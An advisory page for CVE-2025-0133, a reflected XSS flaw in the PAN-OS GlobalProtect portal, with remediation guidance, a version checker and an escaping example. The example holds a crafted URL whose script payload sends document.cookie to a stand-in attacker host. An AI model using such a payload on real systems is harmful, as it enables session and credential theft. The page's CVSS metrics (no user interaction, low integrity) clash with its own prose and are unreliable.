Reflected XSS Vulnerability in Palo Alto Networks GlobalProtect PAN-OS
CVE-2025-0133

6.9 MEDIUM

Key Information:

CVE Published: 14 May 2025

Exploit: known to exist

What is CVE-2025-0133?

A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect gateway and portal features of Palo Alto Networks PAN-OS lets an attacker run malicious JavaScript in the browser of an authenticated Captive Portal user. Exploitation requires the victim to click a specially crafted link; the injected script then runs in that user's authenticated session, so the primary risk is phishing that leads to credential theft, particularly where Clientless VPN is enabled. The flaw has no direct impact on the GlobalProtect features themselves or on the integrity of device content and configuration, so the exposure is to user confidentiality. Deployments with Clientless VPN disabled are at lower risk, but disabling that feature reduces exposure rather than removing the flaw; upgrading to a fixed release listed below is the remediation. For more information, refer to the advisory at Palo Alto Networks.
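The mechanism described above, reduced to its essentials, as an added example that is not Palo Alto Networks code: the GlobalProtect portal source is not public, so the handler, the `msg` parameter and the crafted URL below are all assumptions used to illustrate the reflected-XSS class. The vulnerable renderer concatenates a query parameter straight into HTML; the fixed one entity-encodes it for the HTML text context.

```python
"""Generic reflected-XSS sink beside its fix (illustrative, not PAN-OS code)."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the kind of phishing link a victim would be sent.
# The host names and the `msg` parameter are assumptions, not taken from the advisory.
CRAFTED_URL = (
    "https://portal.example.invalid/login?msg="
    "<script>fetch('https://attacker.invalid/?c='%2Bdocument.cookie)</script>"
)


def query_param(url: str, name: str) -> str:
    """Return the first value of `name` from the URL's query string, URL-decoded."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]


def render_vulnerable(msg: str) -> str:
    # Untrusted input is concatenated into the page without encoding, so the
    # browser parses the attacker's <script> element as markup and runs it in
    # the victim's authenticated session.
    return f"<div class='banner'>{msg}</div>"


def render_fixed(msg: str) -> str:
    # Entity-encode for the HTML text context. quote=True also encodes both
    # quote characters, so the same helper is safe inside attribute values.
    return f"<div class='banner'>{escape(msg, quote=True)}</div>"


def reflects_raw_markup(rendered: str, payload: str) -> bool:
    """True if the payload's active markup survived into the response verbatim."""
    return payload in rendered and "<script" in rendered.lower()


if __name__ == "__main__":
    msg = query_param(CRAFTED_URL, "msg")
    print("vulnerable reflects script:", reflects_raw_markup(render_vulnerable(msg), msg))
    print("fixed reflects script:     ", reflects_raw_markup(render_fixed(msg), msg))
```

Output encoding must match the context the value lands in (HTML text, attribute, URL, JavaScript); `html.escape` covers the first two only. Marking session cookies `HttpOnly` limits what a successful payload can read, but it does not stop the phishing use of the page itself, which is the risk the advisory highlights.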

Affected Version(s)

PAN-OS 11.2.0 < 11.2.8

PAN-OS 11.1.0 < 11.1.11

PAN-OS 10.2.0 < 10.2.17
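A check of a running PAN-OS version against the ranges listed above, as an added example that is not Palo Alto Networks tooling. The ranges are copied from this page's Affected Version(s) list; a release train the page does not mention (10.1, for instance) is reported as "not listed here" rather than as safe, because the page says nothing about it. The `-hN` hotfix suffix format is real PAN-OS versioning, and the sample versions at the bottom are constructed.

```python
"""Classify a PAN-OS version string against the affected ranges on this page."""
import re
from typing import Tuple

# (train, first affected, first fixed), exactly as listed on this page.
# "11.2.0 < 11.2.8" is read as: 11.2.0 and later, but below 11.2.8, is affected.
AFFECTED_RANGES = [
    ("11.2", (11, 2, 0), (11, 2, 8)),
    ("11.1", (11, 1, 0), (11, 1, 11)),
    ("10.2", (10, 2, 0), (10, 2, 17)),
]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(text: str) -> Tuple[int, int, int, int]:
    """Parse 'major.minor.maint' with an optional '-hN' hotfix suffix."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def status_for(text: str) -> str:
    """Return 'affected', 'fixed', or 'not listed here' for a version string."""
    v = parse_panos_version(text)
    for _train, first, fixed in AFFECTED_RANGES:
        if v[:2] == first[:2]:
            # The page lists fixes at maintenance-release granularity, so the
            # hotfix number is ignored: 11.2.7-h2 is still below 11.2.8.
            if first <= v[:3] < fixed:
                return "affected"
            return "fixed"
    return "not listed here"


if __name__ == "__main__":
    # Constructed sample versions.
    for sample in ("11.2.7-h2", "11.2.8", "10.2.16", "10.2.17-h1", "10.1.14", "12.1.0"):
        print(f"{sample:>12}: {status_for(sample)}")
```

Feed it the version shown by `show system info` on the firewall. Treat "not listed here" as a prompt to consult the vendor advisory, not as a clean result.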


CVSS v4

Score: 6.9
Severity: MEDIUM
Confidentiality: Low
Integrity: Low
Availability: None
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: not stated on this page
User Interaction: None

Timeline

  • Vulnerability reserved

  • Vulnerability published: 14 May 2025

  • Exploit known to exist

Credit

XBOW Security